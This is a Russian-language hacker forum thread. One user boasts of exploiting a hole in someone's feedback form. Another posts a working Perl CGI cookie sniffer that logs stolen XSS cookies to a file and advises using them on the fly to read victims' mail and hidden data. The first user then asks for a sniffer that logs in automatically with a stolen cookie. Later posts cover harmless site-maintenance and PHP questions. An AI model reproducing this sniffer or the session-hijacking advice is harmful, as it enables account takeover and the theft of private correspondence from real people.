 28.12.2011 / 14:34 | |
абормот  Пользователь
 Сейчас: Offline
Имя: Дармоед
Регистрация: 18.11.2011
| Alsawin, Да,хотя это не так важно. Мне php не дают,только cgi
|
| 28.12.2011 / 14:37 | |
абормот Пользователь
Сейчас: Offline
Имя: Дармоед
Регистрация: 18.11.2011
| у одного лоха нашел дыру. В обратной связи,сейчас лог смотрел,пишит. Но он не совсем лох,пасс сменил видимо.
|
| 28.12.2011 / 22:44 | |
Лека  Пользователь
Сейчас: Offline
Имя: Лена
Откуда: Скрытенбург
Регистрация: 08.08.2011
| абормот (28.12.2011/13:03)
$data = $ENV{'QUERY_STRING'};$name = $ENV{'SERVER_NAME'};open(LOG,">>cook.txt");$name = $ENV{' print(LOG "$name\t"); print(LOG "$data\n");close(LOG);print "xss активирован\n";Абормот,не издивайся над языком. Если пишишь каку так делай из нее канфетку. #!/usr/bin/perl use CGI::Carp qw(fatalsToBrowser); print "Content-type: text/plain; charset=utf-8\n\n"; $name = $ENV{'HTTP_REFERER'}; open(LOG,">>cook.txt"); print(LOG "$name\t"); ($day, $month, $year) = (localtime)[3,4,5]; $year=$year+1900; $month=$month+1; print(LOG "$year$month$day\n"); @values = split(/;/,$ENV{'QUERY_STRING'}); foreach $get (@values) { ($varname, $vardata) = split(/=/,$get); print(LOG "\t$varname = $vardata\n"); } print(LOG "*****************************************************************\n"); close(LOG); print "xss activated\n";
a вот саму хсс сам ищи. Твой вариан не то. Разбираешь куки и используй их на лету,читай письма,смотри скрытые данные. Разумеется что надо в начале кода юзать лвп или курл,но лвп лучьше и быстрей. |
| 28.12.2011 / 23:29 | |
абормот Пользователь
Сейчас: Offline
Имя: Дармоед
Регистрация: 18.11.2011
| Лека, а можно примерчик?чтоб снифер авторизовался получив куку?
|
| 29.12.2011 / 00:30 | |
Koenig Модератор форума
Сейчас: Offline
Имя: Дмитрий
Откуда: Калининград(Koenigsberg)
Регистрация: 23.01.2011
| Файлы поменять не проблема, ну вылетит ошибка у юзера, обновит страницу и все. На ходу менять и не думать. Можно ночью
__________________
 Магистр Мёда |
| 29.12.2011 / 15:20 | |
Alsawin Пользователь
Сейчас: Offline
Откуда: Минск
Регистрация: 05.09.2011
| Koenig, да, но мы то обсуждали самый быстрый вариант  |
| 29.12.2011 / 19:49 | |
абормот Пользователь
Сейчас: Offline
Имя: Дармоед
Регистрация: 18.11.2011
| самый быстрый это тот что я предложил первым. Создай субдомен,на том же сервере и настраивай его,а переименовать две папки в ручную это минута,перлом и маргнуть0не0успеешь .
|
| 29.12.2011 / 21:31 | |
Koenig Модератор форума
Сейчас: Offline
Имя: Дмитрий
Откуда: Калининград(Koenigsberg)
Регистрация: 23.01.2011
| абормот, По фтп новые заливаешь с заменой и их поочереди все поменяет, не критично в общем
__________________
Магистр Мёда |
| 30.12.2011 / 14:02 | |
Kosma Пользователь
Сейчас: Offline
Имя: Begei
Регистрация: 09.05.2011
| Как проверить на базе совпадание данных?
|
| 30.12.2011 / 14:41 | |
Koenig Модератор форума
Сейчас: Offline
Имя: Дмитрий
Откуда: Калининград(Koenigsberg)
Регистрация: 23.01.2011
| Kosma, А конкретнее? Вообще сравнивать можно == === != !== > < <= >=
__________________
Магистр Мёда |
Скопировать ссылку
Перейти к посту
Фильтровать сообщения
Файлы топика (36)
